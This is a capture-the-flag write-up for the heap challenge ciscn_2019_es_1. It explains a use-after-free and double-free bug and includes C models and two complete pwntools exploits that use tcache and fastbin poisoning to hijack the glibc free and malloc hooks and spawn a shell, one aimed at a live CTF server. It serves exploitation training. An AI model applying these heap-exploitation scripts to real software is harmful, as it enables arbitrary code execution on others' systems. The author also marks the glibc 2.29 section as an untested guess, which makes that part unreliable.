ciscn_2019_es_1

The challenge hint says libc 2.29, but it looks like the wrong libc version was shipped with it.

Simple analysis

1.Add a 996 info
2.Show info
3.Call that 996 compary!
4.I hate 996!

Each add() does malloc(0x18) to create a record chunk for the entry (the name itself goes into a separate content chunk of the requested size); the record's layout is:

	name ----------> content chunk
	size | call
	call

Option 3 (call) is just a free: it does free(name) on the content chunk but leaves the pointer in the record untouched, so the record keeps a dangling pointer. That is a use-after-free: show (option 2) reads the freed chunk back out, and calling the same index again frees it a second time (double free).
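As an added example (my own code, not the challenge binary, whose source this page does not include), here is a minimal C model of the record and of the call bug next to its fix. The field layout follows the diagram above; the 0x18-byte struct, the records table and every function name are assumptions of mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Assumed layout of the 0x18-byte record that add() allocates:
 *   name -> separately malloc'ed content chunk
 *   size    length requested for that chunk
 *   call    the "call" string, stored inline in the rest of the record */
struct info {
    char    *name;
    int32_t  size;
    char     call[12];
};

#define MAX_RECORDS 16
static struct info *records[MAX_RECORDS];   /* indexed by the menu's index */
static int nrecords;

/* "Add a 996 info": one malloc(0x18) record plus one malloc(size) content chunk.
 * Returns the new index, or -1 on failure. */
int add_info(int size, const char *name, const char *call) {
    if (nrecords >= MAX_RECORDS || size <= 0) return -1;
    struct info *rec = malloc(sizeof *rec);          /* == malloc(0x18) */
    if (!rec) return -1;
    rec->name = malloc((size_t)size);
    if (!rec->name) { free(rec); return -1; }
    rec->size = size;
    memset(rec->name, 0, (size_t)size);
    strncpy(rec->name, name, (size_t)size - 1);
    strncpy(rec->call, call, sizeof rec->call - 1);
    rec->call[sizeof rec->call - 1] = '\0';
    records[nrecords] = rec;
    return nrecords++;
}

/* "Show info": returns the pointer that would be printed, or NULL when the
 * record has no live content chunk. */
const char *show_info(int idx) {
    if (idx < 0 || idx >= nrecords) return NULL;
    return records[idx]->name;
}

/* Vulnerable "Call that 996 company!": free(name) with nothing cleared.
 * The record keeps its dangling pointer, so show() reads freed memory and a
 * second call() on the same index frees the chunk again. */
void call_vuln(int idx) {
    if (idx < 0 || idx >= nrecords) return;
    free(records[idx]->name);
}

/* Fixed version: clear the pointer, so show() returns NULL and a repeated
 * call() becomes free(NULL), which is a no-op. */
void call_fixed(int idx) {
    if (idx < 0 || idx >= nrecords) return;
    free(records[idx]->name);
    records[idx]->name = NULL;
    records[idx]->size = 0;
}

int main(void) {
    int a = add_info(0x80, "tcache", "tcache");
    int b = add_info(0x80, "/bin/sh", "/bin/sh");

    call_vuln(a);
    /* Dangling pointer: show() still hands out the freed chunk, whose first
     * qword now holds allocator metadata (the tcache next field on glibc). */
    uint64_t leaked;
    memcpy(&leaked, show_info(a), sizeof leaked);
    printf("index %d after call_vuln:  name=%p first qword=%#lx\n",
           a, (void *)show_info(a), (unsigned long)leaked);

    call_fixed(b);
    printf("index %d after call_fixed: name=%p\n", b, (void *)show_info(b));
    return 0;
}
```

The vulnerable path is exactly what the exploit scripts lean on: show() after call() is the leak, and call() twice on one index is the double free.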

Exploit approach

Ubuntu 18.04 local

First fill tcache, then use the UAF to show the main_arena address sitting in the unsorted-bin chunk and derive libc addresses from it. Concretely: free the same 0x90 chunk 8 times (glibc 2.27 does not detect tcache double frees), so 7 copies fill the tcache bin and the 8th lands in the unsorted bin with fd = main_arena+96, which show prints.

Then double free a chunk into tcache, overwrite its next pointer with __free_hook, allocate twice to get that chunk back and a third time to get a chunk at __free_hook, write system there, and free a chunk whose content is "/bin/sh" to get a shell.

BUU remote

Use the UAF directly: libc 2.23 has no tcache, so a single free of the 0x90 chunk puts it in the unsorted bin, and show prints fd = main_arena+88; __malloc_hook sits at main_arena-0x10.
Then a fastbin double free (free A, B, A on 0x70 chunks), overwrite A's fd with __malloc_hook-0x23, a fake chunk whose size field is the 0x7f byte of a libc pointer stored at __malloc_hook-0x20, so it passes malloc's fastbin size check; allocate until that fake chunk comes back, write 19 bytes of padding plus a one_gadget so the gadget lands on __malloc_hook, then trigger it. The script below does the trigger by freeing the same chunk twice again: on 2.23 the "double free or corruption (fasttop)" error path calls malloc, which runs the hook.

// I'm not sure whether every challenge on BUU ignores its own libc and uses those two provided libcs; if so, it feels inconvenient for solving problems.
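Why __malloc_hook-0x23 and why 19 bytes of padding: the block below is an added example of mine, not code from this writeup, that scans a constructed model of the bytes before __malloc_hook in libc-2.23 for a usable fake fastbin chunk, the same check pwndbg's find_fake_fast performs. The pointer values in the model are illustrative (a typical no-ASLR gdb session); only their 0x00007f... shape matters. The same fake chunk is what the libc 2.29 variant in the next section would reuse.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* glibc malloc arithmetic (64-bit): the low three size bits are flags,
 * and fastbin_index() only looks at the size divided by 16. */
#define SIZE_BITS        ((uint64_t)7)
#define CHUNKSIZE(s)     ((s) & ~SIZE_BITS)
#define FASTBIN_INDEX(s) ((unsigned)((s) >> 4) - 2)
#define MIN_CHUNK        0x20
#define MAX_FAST         0x80   /* default global_max_fast on 64-bit */
#define REQUEST2SIZE(r)  (((r) + 8 + 15) & ~(uint64_t)15)

/* Constructed model of the 0x30 bytes [__malloc_hook-0x28, __malloc_hook+8)
 * in libc-2.23 (Ubuntu 16.04). HOOK_OFF is where __malloc_hook sits. */
#define HOOK_OFF 0x28
static uint8_t region[0x30];

static void put_qword(size_t off, uint64_t v) { memcpy(region + off, &v, sizeof v); }

void build_region(void) {
    memset(region, 0, sizeof region);
    put_qword(HOOK_OFF - 0x20, 0x00007ffff7dd0260ULL); /* _IO_wide_data_0+304: a libc pointer */
    put_qword(HOOK_OFF - 0x18, 0);
    put_qword(HOOK_OFF - 0x10, 0x00007ffff7a92e20ULL); /* __memalign_hook */
    put_qword(HOOK_OFF - 0x08, 0x00007ffff7a92a00ULL); /* __realloc_hook  */
    put_qword(HOOK_OFF,        0);                     /* __malloc_hook   */
}

/* Scan `mem` for an offset usable as a fake fastbin chunk for a request of
 * `req` bytes: its size field (at +8) must map to the same fastbin as the
 * real chunk size, and its user data (from +0x10) must cover `target`.
 * Returns the chunk offset relative to `target` (always negative), or 1 if
 * nothing fits. */
long find_fake_fast(const uint8_t *mem, size_t len, size_t target, size_t req) {
    uint64_t want = REQUEST2SIZE(req);
    if (want < MIN_CHUNK) want = MIN_CHUNK;
    if (want > MAX_FAST) return 1;                            /* not a fastbin request */
    for (size_t off = 0; off + 16 <= len; off++) {
        uint64_t sz;
        memcpy(&sz, mem + off + 8, sizeof sz);
        uint64_t cs = CHUNKSIZE(sz);
        if (cs < MIN_CHUNK || cs > MAX_FAST) continue;        /* not fastbin-sized */
        if (FASTBIN_INDEX(cs) != FASTBIN_INDEX(want)) continue; /* malloc's fastbin check */
        if (target >= off + 0x10 && target + 8 <= off + want) /* user data covers the hook */
            return (long)off - (long)target;
    }
    return 1;
}

/* Filler bytes between the start of the fake chunk's user data and target. */
size_t payload_padding(long chunk_rel_to_target) {
    return (size_t)(-chunk_rel_to_target) - 0x10;
}

int main(void) {
    build_region();
    long rel = find_fake_fast(region, sizeof region, HOOK_OFF, 0x60);
    printf("fake chunk at __malloc_hook%ld (-%#lx), padding %zu bytes\n",
           rel, (unsigned long)(-rel), payload_padding(rel));
    return 0;
}
```

For a 0x60 request (0x70 chunk, fastbin index 5) the first hit is at __malloc_hook-0x23: the size field read there is 0x7f (bytes 0x7f 00 00 ... of the pointer at -0x20), 0x7f & ~7 = 0x78 is in the same fastbin as 0x70, and user data starting at -0x13 needs 0x13 = 19 bytes before it reaches the hook.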

libc 2.29

In 2.29 tcache double frees no longer work: free() writes a key into every tcache entry, and when it sees that key in a chunk being freed it walks the tcache bin and aborts if the chunk is already there. The leak is unchanged: fill tcache, then free once more so the chunk goes to the unsorted bin, and show it. For the double free use the fastbin instead: the tcache bin for that size must be full first (a fastbin-sized free goes to tcache while it has room), then free A, B, A, overwrite the fastbin fd with __malloc_hook-0x23, allocate until the fake chunk comes back, write the one_gadget over __malloc_hook and trigger it with another add(). The error-path trigger used on the remote target does not apply here: since glibc 2.26 a detected double free aborts without calling malloc.

// Pure guess, I don't have a 2.29 environment.

EXP

Ubuntu 18.04 local

from pwn import *

sh = process("./ciscn_2019_es_1.dms")
# sh = remote("f.buuoj.cn", 20173)

def add(size, name, call):
    sh.sendlineafter(b"choice:", b"1")
    sh.sendlineafter(b"\n", str(int(size)).encode())
    sh.sendafter(b"\n", name)
    sh.sendafter(b"\n", call)

def show(index):
    sh.sendlineafter(b"choice:", b"2")
    sh.sendlineafter(b"\n", str(index).encode())

def delete(index):  # "Call that 996 company!": free(name) without clearing it
    sh.sendlineafter(b"choice:", b"3")
    sh.sendlineafter(b"\n", str(index).encode())

add(0x80, b"tcache", b"tcache")             # index 0, 0x90 chunk
add(0x80, b"/bin/sh\x00", b"/bin/sh\x00")   # index 1, freed at the end -> system("/bin/sh")

# glibc 2.27 does not detect tcache double frees: 7 frees fill the 0x90
# tcache bin, the 8th goes to the unsorted bin and its fd becomes main_arena+96
for i in range(8):
    delete(0)
show(0)
sh.recvuntil(b"name:\n")
leak = u64(sh.recv(6).ljust(8, b"\x00"))
main_arena = leak - 96
log.success("main_arena: " + hex(main_arena))
free_hook = main_arena + 7336       # __free_hook - main_arena in libc-2.27
log.success("free_hook: " + hex(free_hook))
system = main_arena - 0x39c800      # system - main_arena in libc-2.27
log.success("system: " + hex(system))

# tcache double free on a 0xa0 chunk, then point its next pointer at __free_hook
add(0x90, b"2", b"2")   # index 2
delete(2)
delete(2)
add(0x90, p64(free_hook), b"call")  # index 3: chunk 2 again, next = __free_hook
add(0x90, p64(free_hook), b"call")  # index 4: chunk 2 once more
add(0x90, p64(system), b"call")     # index 5: this is __free_hook, overwrite with system
delete(1)                           # free("/bin/sh") -> system("/bin/sh")
sh.interactive()

BUU remote

from pwn import *

# sh = process("./ciscn_2019_es_1.dms")
# one_gadget offsets for the libc-2.23 (Ubuntu 16.04) used on BUU
onegadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
sh = remote("f.buuoj.cn", 20173)

def add(size, name):
    sh.sendlineafter(b"choice:", b"1")
    sh.sendlineafter(b"\n", str(int(size)).encode())
    sh.sendafter(b"\n", name)
    sh.sendafter(b"\n", b"call")

def show(index):
    sh.sendlineafter(b"choice:", b"2")
    sh.sendlineafter(b"\n", str(index).encode())

def delete(index):  # free(name) without clearing it
    sh.sendlineafter(b"choice:", b"3")
    sh.sendlineafter(b"\n", str(index).encode())

add(0x80, b"/bin/sh\x00")   # index 0, 0x90 chunk: too big for the fastbins
add(0x80, b"/bin/sh\x00")   # index 1, keeps chunk 0 from merging with top
# no tcache on 2.23: a single free puts chunk 0 into the unsorted bin
delete(0)
show(0)
sh.recvuntil(b"name:\n")
leak = u64(sh.recv(6).ljust(8, b"\x00"))
main_arena = leak - 88
log.success("main_arena: " + hex(main_arena))
malloc_hook = main_arena - 0x10
log.success("malloc_hook: " + hex(malloc_hook))
libcbase = main_arena - 0x3C4B20    # main_arena offset in libc-2.23

# fastbin double free on 0x70 chunks: free A, B, A
add(0x60, b"2")     # index 2 (A)
add(0x60, b"3")     # index 3 (B)
delete(2)
delete(3)
delete(2)
# A comes back first; its fd now points at a fake chunk at __malloc_hook-0x23,
# where the 0x7f byte of a libc pointer serves as a fastbin-sized size field
add(0x60, p64(malloc_hook - 0x23))  # index 4 (A)
add(0x60, b"5")                     # index 5 (B)
add(0x60, b"6")                     # index 6 (A again)
# index 7 is the fake chunk: its data starts at __malloc_hook-0x13, so 19
# filler bytes put the one_gadget exactly on __malloc_hook
add(0x60, b"a" * 19 + p64(libcbase + onegadget[2]))
# freeing B twice trips the fastbin double-free check; on 2.23 that error
# path calls malloc, which runs the hook
delete(5)
delete(5)
sh.interactive()